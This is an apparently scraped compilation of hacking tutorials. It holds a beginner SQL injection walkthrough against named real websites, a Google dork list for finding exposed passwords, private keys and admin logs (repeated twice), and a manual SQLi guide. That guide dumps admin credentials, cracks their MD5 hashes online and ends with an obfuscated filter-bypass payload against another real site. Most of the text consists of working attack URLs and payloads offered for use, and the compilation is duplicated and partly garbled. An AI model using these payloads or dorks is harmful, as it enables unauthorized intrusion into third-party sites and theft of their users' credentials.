Basic part of sqli practically



hello Guyzzz

only for  Educational purpoe

let me intorduce my self



im Adesh kolte  and im from india,



this is my first tutorial on basic sql injection



this was the basic tutorial so it will be  little lengthy so be patient while watching



im not discussing any theory regarding sql injection so i recommend watch some articles about sql db strucute and backend process of sql injection to understand the sql injection in a better way .so im discussing only the practial part.



before starting injecting download the following tool from google



=>  hackbar addon or rootkajji addon for mozilla firefox.



ok lets start with basic  based sql injection





site>  http://greenwall.org/recent-news.php?id=16

we can check whether the site is vulnerable to sql injection or not by putting a singlequote or a back slash (\) after perameter [id=2] lets try on a site



http://greenwall.org/recent-news.php?id=16 '

'



we got the following error





=> check the manual that corresponds to your MySQL server version for the right syntax to use near ''-- -' at line 1

that mean this site is vulnerable to sql injection





and some times even the site dontshow this error there is a chance for sql injection vulnerability



in such cases how we can know that our target site is vulnerable or not ??



obseve the site behaviour mean => when u put  a single quote or  backslash (\) after perameter( id=2' ) u can obseve some content is missing on page or something on the page don't load normally, so it also mean that our target site is vulnerable to sql injection.***



ok lets continue with our injection





 http://greenwall.org/recent-news.php?id=16 '





we got an sql error



first of all we have to fix the query before we go further



(fixing query is nothing but making the site load normally without any error)



usually we use -- in integer based to fix the query



http://greenwall.org/recent-news.php?id='16 '--+ (error fixed)







so we can continue to the next part which is finding number of coloumns in the site



there are many methords for finding no.of coloumns for now im showing only 2 mehords.***



one with order by and the other with group by



1. order by



http://greenwall.org/recent-news.php?id='16 '

 order by 100--+



we got the following error



Query failed: blank some text missing



http://greenwall.org/recent-news.php?id='16 '

 order by 16--+

it mean the site has less than 16 coloumns



now we have to use union statement to find the vulnerable coloumns



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -



u can see 3 and 4 numbers on page(vulnerable coloumns)



now we can get everything from this vulenrable coloumns





lets get some basic information Smile



note::



1. version() or @@version  => to display version of server



2. user() or @@user => to display the username of site







ok lets get them one by one





http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result on web page =>



5.6.29



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_view@localhost







http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_site





thats all for this tutorial

Enjoy

tutorial by Adesh kolte

Video tutorial

Basic part of sqli

https://youtu.be/A-EYrT3i_v0

Hacking Using Google Dork List

 Hacking Using Google Dork List
Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time
 
[Level:Beginner]
 
Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook!
 
The Dork:  intext:charset_test= email= default_persistent=
 
Enter that into Google, and you will be presented with several sites that have username and passwords lists!
 
Method 2: WordPress!
 
This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wp - content/backup - *
 
 
Method 3: WWWBoard!
 
This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt
 
Method 4: FrontPage!
 
This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage - "
 
Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac - trunk - "Google Code" - source - repository
 
Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server - dbs "intitle:index of"
 
Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork: "inurl:Teamspeak2_RC2/server.log"
 
Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log
 
 
Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private
 
And the Ultimate one, the regular directory full of passwords....
 
Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd

Hacking Using Google Dork List

 Hacking Using Google Dork List
Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time
 
[Level:Beginner]
 
Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook!
 
The Dork:  intext:charset_test= email= default_persistent=
 
Enter that into Google, and you will be presented with several sites that have username and passwords lists!
 
Method 2: WordPress!
 
This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wp - content/backup - *
 
 
Method 3: WWWBoard!
 
This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt
 
Method 4: FrontPage!
 
This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage - "
 
Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac - trunk - "Google Code" - source - repository
 
Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server - dbs "intitle:index of"
 
Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork: "inurl:Teamspeak2_RC2/server.log"
 
Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log
 
 
Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private
 
And the Ultimate one, the regular directory full of passwords....
 
Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd

SQL Injection (Manually)


SQL Injection (Manually):-
Let’s Start:
Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to
get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here” and open in new tab.
Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql attack or not.To Check SQL vulnerability add „ sign after the URL
http://www.website.com/news/news.php?id=130
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"
Step2: Find number of columns. Lets use "ORDER BY” clause here, it is used to sort the columns.Choose any number, say 10. Here I have assumed that number columns cant be more then 10.”–” is used for making anything after it comment.
Now go to site which is Vulnerable to SQL.http://www.Website.com/news/news.php?id=130 order by 10– Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9. But again we got an error. This means number of columns are less than 9. Like this we keep on moving, until we don‟t get any error. Finally we reach on ‟6′
http://www.website.com/news/news.php?id=130 order by 6– we didn‟t get any error, this means there are 6 columns.
Step 3:Find vulnerable columns. Now lets use "UNION ALL” and "SELECT” command. Remember to put dash (-) before 130.http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6–. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version” or "verson()” (if first one doesn‟t work).
http://www.website.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6– We got the version on screen. It is. The only thing to note is that version is 5 point something that is greater than 5. We would have followed some other approach in case the version would be less than 5 because there is no database by default like "information_schema” which stores information about tables/columns of other databases. in version less than 5.
Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–
We got first table name on the screen.
To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
Step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with „column‟http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()– There is a repeating element like in this case is „id‟ .From
it, we come to know which table number has which columns.
Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a” is used simply to insert a colon in result to separate it, it is hex of colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin–.
So finally we got the usernames and passwords on screen. But passwords are encrypted. Mostly these encryptions are crackable. Lets choose any username say "Sneds”. The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .
Lets logon to http://md5crack.com/crackmd5.php or http://www.md5decrypter.co.uk and put the hashed(encrypted) password here. And it would crack for us. We got „oorwullie‟ in result ( password in clear text).
Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying.
Sometimes very strong hashes can not be cracked. Login page of website: So you got the key, where is lock now ? Most of the websites have login pages at default locations. There is any website, saywww.xyz.com. The login page would be at www.xyz.com/admin ,www.xyz.com/administrator , www.xyz.com/adminlogin etc. Download this admin page finder
Example of Injection 
www.bitaraf.com
http://www.bitaraf.com/showlink.php?id=.1244923%injecthere   (vulnerable )


http://www.bitaraf.com/showlink.php?id=.1244923+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2Cconcat%280x3c2f7469746c653e3c666f6e7420636f6c6f723d7265643e4164657368206861786f723c62723e%2Cuser%28%29%2C0x3c62723e%2Cversion%28%29%2C0x3c62723e%2Cdatabase%28%29%2C0x3c62723e%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28select%281%29from%28information_schema.columns%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2Ctable_name%2Ccolumn_name%29%29%2C%40%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--+

ADMIN PANNEL